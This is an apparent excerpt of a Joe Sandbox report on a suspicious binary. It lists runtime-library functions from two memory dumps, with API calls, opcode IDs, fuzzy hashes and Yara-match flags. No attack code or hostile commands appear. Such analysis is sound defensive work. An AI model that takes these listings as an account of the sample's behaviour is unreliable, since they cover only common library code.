Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 9c244af1b80992c8c5c11ff33a9a240242c4a027173cbb81dbc6de2572cd5d43
Instruction ID: d103751f5e86bb577f21b0ef41fc0747bac1fbbf4bb65c452d8b20089be38efe
Opcode Fuzzy Hash: 9c244af1b80992c8c5c11ff33a9a240242c4a027173cbb81dbc6de2572cd5d43
Instruction Fuzzy Hash: A7217C75E0021A9FDF00EFA5CC829AEB7B8EF09714F10007AF901B7291D778AD058BA5

Function 020FD648 Relevance: 6.1, APIs: 4, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 020FD6A0
__Xtime_diff_to_millis2.LIBCPMT ref: 020FD6BA
_xtime_get.LIBCPMT ref: 020FD6DD
__Xtime_diff_to_millis2.LIBCPMT ref: 020FD6E9

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
Instruction ID: 08acb21b1cad90b90f8d7671c0ee0acbf50302e296ef2a1a67d0685187d9e2fa
Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
Instruction Fuzzy Hash: F0218E71A40309AFDF40EFA4DC819FEB7B9EF08710F000065E605A7260DB74AE02AFA1

Function 004236DF Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000), ref: 00423729
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423711

Part of subcall function 0041B71C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B73D

__CxxThrowException@8.LIBVCRUNTIME ref: 0042375A
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423783

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
String ID:
API String ID: 2630251706-0
Opcode ID: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
Instruction ID: fbbc1a7e5a16338d661a11365c58371bffdd4c48ac4c368ddaba424d9e7313e5
Opcode Fuzzy Hash: 0708c55e9bf2983c6b837536b85e823e81494798a28270a3cf60b9b0231776e7
Instruction Fuzzy Hash: 5911E9747002146BCF04AF659C85DAEB765EB84761B144067FA059B392CBAC9D41C698

Function 00401F90 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000005), ref: 00401FA5
UpdateWindow.USER32 ref: 00401FAD
ShowWindow.USER32(00000000), ref: 00401FC1
MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 00402024

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Window$Show$MoveUpdate
String ID:
API String ID: 1339878773-0
Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction ID: 53ee9dd5e88c5c6849e3e7895ae91ae42f7fd804de43801a61d80981d891571f
Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction Fuzzy Hash: 90016531E006109BC7258F19ED04A267BA7FFD5712B15803AF40C972B1D7B1AC428B9C

Function 004290B9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 004290D3

Part of subcall function 00429020: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042904F
Part of subcall function 00429020: ___AdjustPointer.LIBCMT ref: 0042906A

_UnwindNestedFrames.LIBCMT ref: 004290E8
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 004290F9
CallCatchBlock.LIBVCRUNTIME ref: 00429121

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 9a28eba3c49a40873050ba514f30250a61a7a586528b59ff06f814ea835fedb3
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 55014032200159BBDF116E96EC41EEB7F7AEF48758F444009FE4896121C73AEC61DBA8

Function 02119320 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0211933A

Part of subcall function 02119287: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 021192B6
Part of subcall function 02119287: ___AdjustPointer.LIBCMT ref: 021192D1

_UnwindNestedFrames.LIBCMT ref: 0211934F
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 02119360
CallCatchBlock.LIBVCRUNTIME ref: 02119388

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 0b605561d20e69dc6776aed1ad99fa2356aed477682207a076b7cbb6b9d4ea88
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 9801D772140149BFDF126EA5CC40EEB7F6EEF98754F054024FE5866120D736E861DBA0

Function 00434F1F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue), ref: 00434F51
GetLastError.KERNEL32(?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431F9C), ref: 00434F5D
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EC6,?,00000000,00000000,00000000,?,0043517E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F6B

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 0dde809cff85efe1a06f082dffa05588a2f4c4b6f5b2494ffdd5bda6add1d188
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 3401FC36615322AFC7214F69AC449A77B98AF89FA1F241531F905D7240D724E90186E8

Function 02125186 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0212512D,00000000,00000000,00000000,00000000,?,021253E5,00000006,0044A378), ref: 021251B8
GetLastError.KERNEL32(?,0212512D,00000000,00000000,00000000,00000000,?,021253E5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,02122203), ref: 021251C4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0212512D,00000000,00000000,00000000,00000000,?,021253E5,00000006,0044A378,0044A370,0044A378,00000000), ref: 021251D2

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 0de63f0111471c8ad9a3d4fde6e751aa21ea5db876632ac8faec367f34434b58
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 7401F736692332BBC7294F699C84A567799AF06FA27610630F906D7140C720D915CAE4

Function 0042611E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426138
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042614C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426164
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042617C

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: ba6f451568feed0ad97d4c35bc03da7052fef1102373e57c37541bd94dea7e10
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: DD01F236700224A7CF16AE5AA811AFFB7A99F80354F41005BFC11A7282DE24FD2192A8

Function 02116385 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 0211639F
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 021163B3
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 021163CB
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 021163E3

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: 82d0d3057a05f81cc57a16e18d218942299d9c73aacd8a38d8e2ae7cfed52758
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 76014932640124BBCF15EE59C840EEF779E9F95350F010035EC29E7281DBB2ED008AA1

Function 02112B72 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 02112BA1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02112BBF

Part of subcall function 02108677: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 02108698
Part of subcall function 02108677: Hash.LIBCMT ref: 021086D8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02112BC8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02112BE8

Part of subcall function 0210F6CF: Hash.LIBCMT ref: 0210F6E1

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction ID: f5783e4790facb736c50fa92ceb9f93212be5efd8e555e86ea0c01f3afdde771
Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction Fuzzy Hash: AE115E76900604AFC725DFA5C881EDAF7B9BF19310F008A5EE95687591DBB0E914CBA0

Function 02112B81 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 02112BA1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 02112BBF

Part of subcall function 02108677: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 02108698
Part of subcall function 02108677: Hash.LIBCMT ref: 021086D8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 02112BC8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 02112BE8

Part of subcall function 0210F6CF: Hash.LIBCMT ref: 0210F6E1

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction ID: 0de8c90a5c6c0c9cc398546e7f60f9ff015f68804133c08cd82fbaa86a06bc7d
Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
Instruction Fuzzy Hash: 67011776500604AFC724EFA5C881EDAF7E9AF58310B008A2EA65687590DBB0F944CBA0

Function 00405915 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040591C

Part of subcall function 0040BB3D: __EH_prolog3_GS.LIBCMT ref: 0040BB44

std::_Locinfo::_Locinfo.LIBCPMT ref: 00405967
__Getcoll.LIBCPMT ref: 00405976
std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405986

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: b945d4fba948faf335eba6a26c9d16208f5764ada45908dbcbdd3d34a3e84dcb
Instruction ID: 7de8e0425e838f52bf763386e227ca4e4c8dd97e461cbe55c35c0d0d082d521b
Opcode Fuzzy Hash: b945d4fba948faf335eba6a26c9d16208f5764ada45908dbcbdd3d34a3e84dcb
Instruction Fuzzy Hash: 61011771910209DFDB10EFA5C486B9DB7B0EF04329F10843EE459BB681DB789549CF99

Function 020F50C0 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 020F50C7

Part of subcall function 020FBDA4: __EH_prolog3_GS.LIBCMT ref: 020FBDAB

std::_Locinfo::_Locinfo.LIBCPMT ref: 020F5112
__Getcoll.LIBCPMT ref: 020F5121
std::_Locinfo::~_Locinfo.LIBCPMT ref: 020F5131

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: aff552bf37bfddc61d9e477734a816809d81299120f6a55e324a792514706cbd
Instruction ID: ab69d8b07a770331f1e8f5537deecd9f21f2120ee57254620474e722e5c7b70c
Opcode Fuzzy Hash: aff552bf37bfddc61d9e477734a816809d81299120f6a55e324a792514706cbd
Instruction Fuzzy Hash: 1B019E71D80308DFEB80EFA4C444BDDBBB2BF84311F10812AD145ABA80CB789944DF91

Function 020F5B7C Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 020F5B83

Part of subcall function 020FBDA4: __EH_prolog3_GS.LIBCMT ref: 020FBDAB

std::_Locinfo::_Locinfo.LIBCPMT ref: 020F5BCE
__Getcoll.LIBCPMT ref: 020F5BDD
std::_Locinfo::~_Locinfo.LIBCPMT ref: 020F5BED

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
String ID:
API String ID: 1836011271-0
Opcode ID: ed65b9f5cd0855bdbf339c1b5aedfa909ef6e81665b606bc02af1812e3ab0e20
Instruction ID: 8a3f3cd91ba4d91a80f20d58a4e7ff23d373ca9a3de965805dceb4e9c8f242a5
Opcode Fuzzy Hash: ed65b9f5cd0855bdbf339c1b5aedfa909ef6e81665b606bc02af1812e3ab0e20
Instruction Fuzzy Hash: 98014C71990309DFEB84EFA4D844BDDBBB1BF44315F10812AD105ABA81DBB89944DF91

Function 0041BEC7 Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BEF9
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF2D

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: 54cf5004022dc03f320fac5c152f4f5b0e5638c7bf5de93af177e0e0418c077f
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 1901FB3744418DBBDF119E64DD428EE3B66EF08354B148516F918C4235C336CAB2EF89

Function 0210C12E Relevance: 6.0, APIs: 4, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0210C160
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0210C170
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0210C180
std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0210C194

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Compare_exchange_acquire_4std::_
String ID:
API String ID: 3973403980-0
Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction ID: 36b6fda6c053183a1a86d0735daeb16c3056ce874f39eb91f7c8208493e5dd06
Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
Instruction Fuzzy Hash: 6701E87A084149EBCF129F54DC808AE3B26BB55254F048626F928840A0D3B2CA70AED1

Function 0040D215 Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110CB

Part of subcall function 0041093D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041095F
Part of subcall function 0041093D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 00410980

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110DE
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 004110EA
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 004110F3

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: 59b962ce0df35001d24a788376b82219d2b26174a8e6e3787add2960edfe3223
Instruction ID: f673f10ca75d55ca35707f3ec936348daa0dfd556a05ba3ac72040e7cf752ef9
Opcode Fuzzy Hash: 59b962ce0df35001d24a788376b82219d2b26174a8e6e3787add2960edfe3223
Instruction Fuzzy Hash: 2EF02470A002046BDF347BB648525EE35954F85318F04403FBA12AB7D1DEBC9DC6939D

Function 004134FC Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413515

Part of subcall function 0041289F: ___crtGetTimeFormatEx.LIBCMT ref: 004128B5
Part of subcall function 0041289F: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128D4

GetLastError.KERNEL32 ref: 00413531
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413547
__CxxThrowException@8.LIBVCRUNTIME ref: 00413555

Part of subcall function 00412675: SetThreadPriority.KERNEL32(?,?), ref: 00412681

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
Instruction ID: 0599dc728a4d66ec5529e5430020c2b67b59d3184165c4d7970fdf63fa2ec416
Opcode Fuzzy Hash: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
Instruction Fuzzy Hash: 6AF08271A002253AD724BA765D07FFB369C9B01B54F90095BB905E6186F9ECD99042AC

Function 02103763 Relevance: 6.0, APIs: 4, Instructions: 39threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0210377C

Part of subcall function 02102B06: ___crtGetTimeFormatEx.LIBCMT ref: 02102B1C
Part of subcall function 02102B06: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02102B3B

GetLastError.KERNEL32 ref: 02103798
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 021037AE
__CxxThrowException@8.LIBVCRUNTIME ref: 021037BC

Part of subcall function 021028DC: SetThreadPriority.KERNEL32(?,?), ref: 021028E8

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
String ID:
API String ID: 1674182817-0
Opcode ID: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
Instruction ID: 97c6baa9be6efa72ee6f87d0a7fb231808cc8ecddd7964ea227ca4069b09ff3e
Opcode Fuzzy Hash: 3fadc1366d0a75540ac8f783509af273c6311a84a5b4fac4ceb4b62defc82512
Instruction Fuzzy Hash: 82F0A7B26803153DE720B7755C8EFBB369C9B01750F500967B915E70C0EBE9E4048AB9

Function 020FD47C Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON

Download Yara Rule

APIs

Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02101332

Part of subcall function 02100BA4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02100BC6
Part of subcall function 02100BA4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02100BE7

Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02101345
Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02101351
Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0210135A

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
String ID:
API String ID: 4284812201-0
Opcode ID: fab2751c85c2460bc8d3eb096a8fe9c9e671c40a46efb78719edf7368fe23de1
Instruction ID: d9a5219f293fd395e8c133cc299e4b1060bcf906a7bd537921fed3360840a84c
Opcode Fuzzy Hash: fab2751c85c2460bc8d3eb096a8fe9c9e671c40a46efb78719edf7368fe23de1
Instruction Fuzzy Hash: 6BF0B4316C07057BDF28BBB448D46BE72974F85324B044129E5155F7C0DFF98D01EAA4

Function 0210D064 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0210D078
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0210D09C
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0210D0AF
__CxxThrowException@8.LIBVCRUNTIME ref: 0210D0BD

Memory Dump Source

Source File: 00000000.00000002.3754714208.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_20f0000_b0cQukXPAl.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3657713681-0
Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
Instruction ID: f4d4436236291f8c1d45eefcde78cf041b679fb7efb332b2b4d62cbf4c7704b7
Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
Instruction Fuzzy Hash: B0F059319802046BC324FA94F8C0C9EB37BCEC0B14721812AD809131C5DBB1A90ACF92

Function 004125E1 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegisterWaitForSingleObject.KERNEL32(?,00000000,00423582,000000A4,000000FF,0000000C), ref: 004125F8
GetLastError.KERNEL32(?,?,?,?,004185B9,?,?,?,?,00000000,?,00000000), ref: 00412607
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041261D
__CxxThrowException@8.LIBVCRUNTIME ref: 0041262B

Memory Dump Source

Source File: 00000000.00000002.3753884768.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b0cQukXPAl.jbxd

Similarity

